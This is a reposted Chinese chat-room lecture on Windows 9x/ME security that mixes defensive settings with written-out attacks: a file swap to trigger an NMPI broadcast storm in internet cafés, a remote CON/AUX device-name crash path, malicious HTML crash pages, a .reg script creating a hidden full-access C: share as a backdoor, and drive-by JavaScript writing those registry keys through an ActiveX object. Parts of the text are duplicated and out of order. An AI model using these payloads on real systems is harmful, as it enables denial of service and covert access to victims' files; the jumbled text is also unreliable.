文章来源：X档案

看见这篇文章很经典,所以就转过来了,希望大家能认真看下去,免得我偷贴偷得那么辛苦却白费力气偷了..


请大家不要说话了……OK？今天的课程是由我来主讲的，我叫冰血封情，大家多多交流……
今天我们讲的内容其实都是很简单的，不涉及任何入侵，为什么呢？
我个人认为，要想成为一个真正优秀的（本人不是）网络安全学习者，那么最起码的应该首先要会保护自己的系统。
一个连自己的国家安全都无法保护的人，还怎么去派间谍渗透别的国家呢？同样，我们比学赶帮超保护好自己的系统才能够有资本渗透其他的站点扯远了。。
总而言之就是一句：要想入侵，先学好防护。
关于防护，现在网络上有一部分所谓的‘黑客’，不知道因为穷还是‘懒’，他们所用的系统是没有任何杀毒工具和防火墙的，难道他们就那么信任自己的机器不会有病毒？到底是信任还是放任呢？
本人认为（只是我的个人看法），一个真正的网络安全学习者，是必须有一款可以和网络最新的病毒数据同步的杀毒软件和一款能拦截大部分入侵渗透的防火墙的。
也许有人会问？杀毒软件是经常查杀我们的EXP和ATTACKER的，你用杀毒软件的确会这样，那么我们怎么办？
有两种方法：1、使用自己修改工具（请参照《黑客X档案》相关文章）；2、在网络空间建立武器库（100M免费http://www.freewebs.com/），一个优秀的黑客，他自己的计算机应该是一个纯粹的武器。并且在网络上有自己的空间存放时时要用到的工具。
说了那么多，就是让你维护自己的计算机安全的时候能够跟正规化！
很多的朋友学习安全的时候都只是当玩了，盗窃别人的ID、帐号等东西……可是这些是根本无意义的，是否想过，对技术的提高，他们能给你多大的启发？
不要把网络安全当作一种游戏或者是娱乐，而是把他当作一种事业，在庞大的网络安全数据系统中要保持自己的技术永远最新，是一件很痛苦的事情。所以选择了安全这条路的人都是勇敢的！再重复，这个：不要把网络安全当作一种游戏或者是娱乐，而是把他当作一种事业
前面的水话其实是很有意义的，大家一定要好好琢磨一下，现在切入正规技术话题：
现在切入正规题：简单介绍一下WINDOWS9X/XP网络安全防护技巧
这里我要说一句，想研究安全，请用NT/2000/XP/2003系统，98出于对网络的支持和多方面的因素，是不适合用来弄渗透检测的！当然也有一些工具是必须在98下跑的，可是那样你完全可以在现有的NT架构系统中使用虚拟机。
先说说WINDOWS98/ME系列，以下用WINDOWS98代替，在WINDOWS98下如何保护自己的系统安全？
意：我这里假设的是你是单机上网，即便是在LAN中我也假设你不和任何人做共享连机的。并且已经满足我前面所说的所有条件，即：杀毒工具和防火墙
139系列共享的问题
ＣＯＮ虚拟硬件驱动程序攻击
NMPI网络广播风暴问题
非$无共享符的共享（不只存在与WIN9X）
trojan木马问题
IGMP一类攻击问题
internet恶意网页问题（大话题）
：以上都是我们今天在WINDOWS98部分要涉及到的相关问题，当然不会很全面，水平所限。大家可以在过后提出其他的问题
对于139端口来说，已经是老生常谈了，我们这里只谈论如何关闭他，当然你的防火墙也会不让人访问他的。我们这里把139系列共享的问题、NMPI网络广播风暴问题、ＣＯＮ虚拟硬件驱动程序攻击、非$无共享符的共享放在一起讲。
先说NMPI，这里有我2002年在中国黑客联盟——地址是http://www.cnhacker.com/（注意：我个人永远不承认http://www.chinahacker.com/是中国黑客联盟）写的一篇原创文章：
不知道大家是否听过MICROSOFT-NETBIOS？
NetBIOS(Network Basic Input Output System，网络基本输入输出系统)，是一种应用程序接口(API)，作用是为局域网(LAN)添加特殊功能，几乎所有的局域网电脑都是在NetBIOS基础上工作的。
在我们的Windows 95、9７、或Me中NetBIOS是和TCP/IP捆绑在一起的,这是十分危险的！
下面我们说NMPI，如果NWLink(允许微软的Windows与Novell工作站一起启动)在一个Windows9X或ME系统中启动，它有可能生成广播风暴（会严重阻断网络操作或引起目标计算机崩溃）。被影响的Windows系统：
WINDOWS9X/ME系列，他的危害是十分可怕的，甚至可以让整个LAN崩溃，但是仍然目前有很多98的网吧管理员意识十分低
这样介绍吧。IPX/SPX(Internet网络包交换／顺序包交换)是由NWLink实现的协议，能通过网络周期性发送广播消息。NMPI(Netbios 域名管理端口接口)能在用IPX实现
直接主机管理时用来替代NetBIOS。Windows 9x 和ME没有解决NMPI包（包含的网络源地址和目的地址保持相同的值）的问题。发送这种类型的包会生成广播风暴，因为每一个收到广播的计算机都会给广播地址发出响应，这样一来受影响的是整个网段。
一个畸形NMPI包会立即造成大量网络阻塞，而且重复发送这样的包会引起长时间的网络停机。除非是一台在安装系统之前已经预置了即插即用网卡的Windows95计算机，否则IPX在Windows9x或ME系统中并不是默认安装的
而网吧在各方面都符合以上的条件，您如果胆大的话，可以用您的网吧做这个实验，下面是详细用法：如你是9X系统，你可以备份WINDOWSSYSTEMNWLINK.VXD,WINDOWSSYSTEMVSERVER.VXD 两个文件，
把从http://go.163.com/~lfire1/soft/nmpi.zip下载来的文件（其实自己也可以做不就是个畸形的.vxd吗！）
注意：以上的URL已经删除了，无法下载，以防有仍用之破坏，特别是不听原理的……
件解压后的两个文件拷贝到系统目录覆盖那两个文件，重起机器。现在你的内部网的95，98机器就会大量死亡。此时你只能访问一个工作组的机器。
试验WINDOWS的这一BUG，对其造成的一切后果本人不负责任。以上就是NMPI的危害，够可怕吧！当然我们这类也只是描述，为了不让这种危险的东西和成品泄露，很多网络安全学习者都做出了努力
前面我说过了，很多人都把网络安全当作一种娱乐，鉴于国内的学术气氛和安全状况，所以直到MICROSOFT推出新的系统之前，掌握这些技术的人都没有将他泄露，成功屏蔽了这个危险的问题，相对RPC来说，已经是很万幸了。
下面说说共享密码的问题，很多朋友从98走过来都应该清楚，一般WIN98在网络上共享了文件之后，如果设置了访问密码，那么将可以象征性的阻挠一部分非法用户的越权访问。
第四自己不要贪恋美色去欣赏黄色站点或者是激情电影什么的！（比如这里的冰血封情同学特别要注意这条，嘿……）
到这里，WINDOWS9X/ME的安全就基本讲完了，如果有什么没明白的地方，课后会有时间答疑。大家把问题先记录下来，我们现在进入第二个环节
可是如果你是使用WIN98的默认设置，并且没有打安全补丁。那可麻烦了！对方可以用netpass一类的软件，轻松绕过你的密码。因为问题也出在NetBios上，现在知道为什么把这两个问题放在一起讲了吧？
原理是这样的（万事万物都应该知道根源）：我们都清楚，系统服务端在对客户进行口令校检的时候是以客户端所发送的长度数据为依据的。
因此，客户端在发送口令认证数据包的时候可以设置口令长度为1，同时发送一个字节的明文口令给服务端，那么服务端就会把客户端发来的口令与本地的共享口令的第一个字节做明文比较，如果匹配就通过。
那这样，只要猜测口令的第一个字节就可以了。那不是很快就破了密码了。以CPU的运算能力，穷举键盘上所有能做密码的九十多个键（除开回车等特殊键）应该是闪电般。
现在很多大学都使用LAN考试，局域网搜索改卷，时常用98开共享，我所在的学校在计算机方面已经是国内比较好的了，但是仍然存在这样的安全问题。考机试的时候可以随便参考他人的试卷……试想，如果有人这样看你的资料，不是很可怕么
：其实这个也是NETBIOS的错，下面我们再来看一个更危险的，共享资源再犯错误！还是NETBIOS的错虚拟硬件驱动程序漏洞，大家一定很清楚了，就是大家经常说的ＣＯＮ、ＡＵＸ什么的
个大家都清楚的明白如何使用了，可是有几个人知道具体的原因呢？我们来说说他吧。说那个攻击要先说$共享。
：注意：以下内容摘自冰血封情原来创文章《[原创]设备名称解析漏洞探秘》
1、扫平障碍：众所周知，在设置共享的时候是有一种“$共享名技巧”的。就是在共享名后加$符号，例如：C$、HH$、DAAD$等。这样一来，在网络邻居中该共享就不会显示出来，必须正确输入共享路径及共享名才能看见该共享的资源！
那如果LAN中的我们想攻击别人呢？真的没办法了吗？当然有，现在教：只要您用一个十六位编辑器将自己WINDOWSsystem中的msnp32.dll文件中的数据
24 56 E8 17改为00 56 E8 17就可以让这些$共享名显示出来了？现在$共享也没办法躲了，我们就开始说说正题设备名称解析漏洞。
2、开始攻击：现在来说说设备名称解析漏洞吧。这个叫法有很多，有的叫“设备名称解析漏洞”（见《WINDOWS 9x/Me/NT/2000/XP 常见漏洞攻击与防范实战》），
有的叫“设备命令死机漏洞”（《黑客任务实战（个人漏洞篇）》），我查阅了一些资料官方还是叫“设备名称解析漏洞”的多，所以就先这么称呼吧。
漏洞的产生原因，其实是98操作系统上为了提高DOS兼容性而保留的，而又因为98和DOS的架构过于紧密，这本是DOS命令中的问题却给可怜的WINDOWS也一起兆发了悲音。
在WIN9X中有几个设备驱动程序，用来指向一些设备的名称，他们是：ＮＵＬ、ＣＯＮ、ＡＵＸ、ＰＲＮ、ＣＯＭ、ＣＬＯＣＫ、ＣＯＮＦＩＧ……
以上的命令都可以象ＣＯＮ一样用来攻击以上的命令都可以象ＣＯＮ一样用来攻击 下面我来解释一下这些命令的来源
ＮＵＬ空设备驱动程序 ＰＲＮ打印机端口！ ＣＬＯＣＫ时钟设备！ ……其实N多，作用一样就不多说了，在WIN9X下，这几个程序可是一运行就死机！
现在知道为什么这么可怕了吧，这些可都是正牌的硬件驱动程序，杀毒软件也没办法了：）更为严重的是这三个文件还可以远程执行，这样一来就给不法攻击者有利可图，特别在网吧一类管理不善的LAN中，很多几乎是一招毙命。只要按照下面的方法执行：

\对方ＩＰ对方共享盘符（或者共享名）ＡＵＸＡＵＸ
类似的可以随便换用里面的执行设备，执行后，你就可以用软件探测到对方会失去一会连接！嘿嘿！那就是死机重新启动了。
3、网络黑手：此漏洞还可以作用于网络，利用网页恶意调用本地的命令，如果是98，又没打过补丁、又没网页监控只要浏览该Web就必死无疑。恶意网页的原文件的核心代码如下
<Ｉｍｇ　Ｓｒｃ="C:ＣＯＮＣＯＮ"><A Ｈｅｒｆ="Ｃ:ＣＯＮＣＯＮ"></A>其实以上两个实现的时候都各有不爽，下面冰血封情给你一个更狠的：<html><head><title>Hackway Power Of China Attacker</title></head>
<body bgcolor="#666696" text="#000000" id="all" leftmargin="10" topmargin="10" marginwidth="10" marginheight="10" link="<div align="center"><A Ｈｅｒｆ="Ｃ:ＣＯＮＣＯＮ" onmouseover="while(true){window.open()}">黑色海岸线</A>
</div></body></html>
解释一下，上面的代码是用javascript开无数窗口，只要用鼠标一指“黑色海岸线”那几个字就会死机，因为所开无数窗口连接都指向了Ｃ:ＣＯＮＣＯＮ毒吧？：4、安全建议：按照老规矩，有攻有防，下面冰血封情给出漏洞修补建议：
先，我强烈建议你升级操作系统到2000以上。实在不愿意那么可以到MICROSOFT公司进行在线UPDATE 另外还有一个重要的问题！！！！就是对方必须是在WINDOWS下，如果对方当时如果是在玩DOS类的游戏也不行的。很多朋友使用的时候自己也蓝了，那是因为自己也没打补丁。
非$无共享符的共享，这个可是个重要问题，也是安全界为数教少的人掌握的东西
这个东西放在这里实在有点牵强，因为在NT下设置不当也有可能早晨类似的问题。但是98下最早滋生就姑且放这里吧。下面的内容来源于冰血封情原创文章《[原创]浅谈无共享符的共享的实现及网页共享恶意代码》：
近些年来，我国网络发展迅速，不知不觉恶意网页的技术也越来越高，从最开始的网页脚本简单改动系统注册表到而今的*.dll文件实现每次启动修改系统。更高深的技术我们不说，单单一个共享硬盘就够毒辣的了，所以才有这篇拙文。众所周知，在系统中共享一个文件或文件夹乃至分区，一般的共享都会有个小手拖住你所共享的文件夹或分区。
如果我们成功入侵对方的系统后，给对方加上这样的共享，那么很明显是很容易被发现的 可是要是给他加上个标题上所说的‘无共享符的共享’，可就没那么容易被发现了！那么我们今天就来看看传统的隐藏共享和无共享符的共享的区别。经过多次的尝试之后，冰血总结了如下几个共享后注册表的键值区别：
一、普通共享的建制内容，这样的共享，是很容易被发现的，就是有小手的那种：）。

二、‘$’（读‘串’）字符共享。这种共享的特性很多书都说过了，其中最具特色的是在‘网络邻居’中看不到你所共享的分区或者文件夹，这里冰血封情就不在赘述，下面我门请出我们今天的主角，无共享符的共享。
：二、‘$’（读‘串’）字符共享。这种共享的特性很多书都说过了，其中最具特色的是在‘网络邻居’中看不到你所共享的分区或者文件夹，这里冰血封情就不在赘述，下面我门请出我们今天的主角，无共享符的共享。
]炮制过程如下：
1、启动注册表编辑器，依次展开如下键值[HKEY_LOCAL_MACHINEsoftwareMi-crosoftWindowsCurrentVersionNetworkLanmanC$]
这里最后一个‘C$’是共享名，起什么都可以，有没有‘$’都一样，因为后面我们是直接通过键值属性完成设置的……
2在右边的窗口中点击右键，新建键值，Flags(0x00000302(770))、Parm1enc(长度为零的二进制) 、Parm2enc(长度为零的二进制)、Path(键值为你想共享的分区)、Type（默认）、Remark（默认）
：闭注册表编辑器，按F5刷新系统，必要的时候可以选择注销或重新启动：）然后‘网络邻居’中，
在地址栏键入‘\共享计算机名C$’（不含引号）。看看该扇区是不是可以正常访问了？：）而且是完全访问的权限哦……现在你去看看那个没有小手托起的你设置的扇区的‘属性’-‘共享’。
没有说共享了？？对！！这就是‘无共享符的共享’。：那么刚才我们说的是实现的过程，真正的入侵您不一定能这样直接方便的修改远程主机的注册表编辑器，那么我们可以编辑一个REG脚本轻松实现，脚本内容如下：
那么刚才我们说的是实现的过程，真正的入侵您不一定能这样直接方便的修改远程主机的注册表编辑器，那么我们可以编辑一个REG脚本轻松实现，脚本内容如下：
REGEDIT4 //这里是以98/ME为例子，//这里一定要空一行 [HKEY_LOCAL_MACHINEsoftwareMicrosoftWindowsCurrentVersionNetworkLanmanC$]
"Flags"=dword:00000302
"Parm1enc"=""
"Parm2enc"=""
"Path"="C:"
"Type"= dword:00000000
"Remark"=""//这里一定要回车一次
将以上文字复制保存为‘所有文件’，‘*.reg’，使用的时候只要想办法导入对方注册表就可以了，至于怎么让对方运行它，以前很多书和文章都有介绍，这里不再说了，方法很多！这里主要讲防护。所以就不说攻击那么详细了
现在我们来看看恶意网页是怎样实现，一下给出共享网页浏览者硬盘的恶意代码核心部分。
<script language=javascript>//这里声明了脚本语言
document.write("");function f()
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); //这里很重要，利用了注册表的对象

a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\
Network\LanMan\RWC$\Flags",302,"REG_DWORD"
); //结束第一次改写
Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Path","C:\");}function init(){setTimeout("f()", 1000);
：}
init();
</script>//所有的动作完了就结束这个脚本
那么只要你把核心代码部分的注册表键值做些简单的修改。就可以实现恐怖的一幕了：）根本看不见的情况下被人共享了硬盘，让人鱼肉于无形之中
安全防范：检查上述注册表键，发现问题立刻将它删除！
就是把HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanMan下面的“RWC$”删掉。也可以把windowssystem下面的Vserver.
再把HKEY_LOCAL_MACHINESystemCurrentControlSetServicesVxD下的Vserver键值删掉。然后通过如下设置避免悲剧重演！
1、将IE“工具→Internet选项→安全→Internet区域的安全级别设为“高”
2、IE设置中将ActiveX插件和控件、Java脚本等全部禁止。（该操作可能会造成一些正常使用ActiveX的网站无法浏览）
3、对于Windows98，请打开C:WINDOWSJAVAPackagesCVLV1NBB.ZIP，把其中的“ActiveXComponent.class”删掉；对于WindowsMe用户，4、安装网络防火墙，推荐Norton2001，KVW3000或者更高版本。很恐怖的吧？那么怎样修补这些错误呢？就是关闭139、不提供任何共享
以下是关键的地方，不管你前面是否听明白，但是照着我说的做就可以解决问题了
方法一、（这个方法是比较难实现的，很多朋友都说不好找。）
1.检查NetBEUI是否出现在配置栏中。打开控制面版，双击“网络”选项，打开“网络”对话框。在“配置”标签页中检查己安装的网络组件中是否有NetBEUI。如果没有，点击列表下边的添加按钮，选中“网络协议”对话框，在制造商列表中选择微软，在网络协议列表中选择NetBEUI。点击确定，根据提示插入安装盘，安装NetBEUI。
[系统]游客600847进入了本聊天室
2.回到“网络”对话框，选中“拨号网络适配器”，点击列表右下方“属性”按钮。在打开的“属性”对话框中选择“绑定”标签页，将除“TCP/IP->网络适配器”之外的其它项目前复选框中的对勾都取消！
3.回到“网络”对话框，选中“TCP/IP->拨号网络适配器”点击列表右下方“属性”按钮，不要怕弹出的警告对话框，点击“确定”。
在“TCP/IP属性”对话框中选择“绑定”标签页，将列表中所有项目前复选框中的对勾都取消！点击“确定”，这时Windows会警告你“尚未选择绑定的驱动器。
现在是否选择驱动器？”点击“否”。之后，系统会提示重新启动计算机，确认。4.证实己取消绑定。重新进入“TCP/IP->拨号网络适配器”的“TCP/IP属性”对话框，选定“NetBIOS”标签页，看到“通过TCP/IP启用NetBIOS”项被清除了吧！

连点两次“取消”退出“网络”对话框(不要点“确认”，免得出现什么意外)。好，现在你便可以放心了。
方法二、（鉴于方法一的情况，冰血封情找到了另外一种方法）这个方法对WINDOWS9X/ME应该是最行之有效的了
首先，打开"控制面版"，双击"网络"，然后单击"文件及打印共享"，将弹出的窗口的两个勾取消，确认后就OK！
然后，进入注册表编辑器，HKEY_LOCAL_MACHINESystemCurrentControlSetServicesVxDVNETBIOS将键名StaticVxD的键值数据设空就全搞掂了！就这么简单
下面说说前面大主题中的trojan木马问题、IGMP一类攻击问题。这些东西我们就一笔代过了。因为只要你安装了杀毒软件和防火墙就不必担心了。
这里防火墙我个人推荐天网就可以了，因为没必要太好，基本都一样：）对于新木马的查杀，这里冰血封情有要说一一个系统的使用者，应该对自己的系统了如指掌，
没个开机启动的项目都平时安装了什么，加在了什么自己应该清楚，那么当出现问题的时候就一个系统的使用者，
应该对自己的系统了如指掌，没个开机启动的项目都平时安装了什么，加在了什么自己应该清楚，那么当出现问题的时候就自己可以驾轻就熟。
但是一般世面上出现的木马，杀毒软件都是可以在第一时间查杀的，所以普通拥护没必要担心这些新木马对你会造成什么样的影响
这里就没什么太多的了，因为重点在前面已经说了，下面我们说internet恶意网页问题
这个问题我觉得，是属于一个万变不离其宗的专题。虽然方法种类N多，但是无非就是注册表、IE漏洞……
所以只要把注册表玩熟了那就好办……
首先说说我个人的感想：其实人人都弄注册表，可是我也不知道是自己笨还是怎么的，我从1998-2002才彻底弄清楚WINDOWS9X/ME系列的注册表。几年？<_<！我不知道一些高手是怎么研究的，但是我觉得时间长点但是比较细致吧。
授之与鱼不如授之与渔！这里我告诉大家我是如何学习注册表的
如果你下顶决心学习一样东西，就一行一行的把他都分析阅读研究完。地毯式的一个也不漏过！
辛苦是很必要的，但是没有辛苦怎么会有收获，另外很多朋友都没有注意到一个关键的问题。
每当你的系统出现问题的时候，你应该意识到WINDOWS已经销售了那么多年，已经是很热的一个操作系统，不可能全世界就你一个出现这个问题的。问题可能早都有很多高手出现过有解决了，并且已经发布了。那么这里还是一句老话，学注册表这类容易的东西
搜索网站就是你最好的老师,具体的一些实例，网络上是很多的，其实什么恶意站都不怕，主要是网页木马！
嘿嘿 ,以前windows出了问题,都没注意到注册表呢？当你被一个恶意站点修改了之后，应该去网络上搜索相关的结决办法。如果你没找到，那么请阅读一下GOOGLE的搜索指南……搜索技术文章推荐GOOGLE！
我这里提供一些防护策略：第一要把IE升级到6.0并且安装相应的最新补丁！第二杀毒软件是用网页恶意脚本监控的，打开他可以防住一些！
第三陌生人或者不熟悉的人发给的页面都不要随便访问，实在要访问，请关闭所有的ACTIVEX和JAVA控件！
第四自己不要贪恋美色去欣赏黄色站点或者是激情电影什么的！（比如这里的冰血封情同学特别要注意这条，嘿……）
到这里，WINDOWS9X/ME的安全就基本讲完了，如果有什么没明白的地方，课后会有时间答疑。大家把问题先记录下来，现在我们进入第二节。http://netadmin.77169.com/HTML/20050219024800.html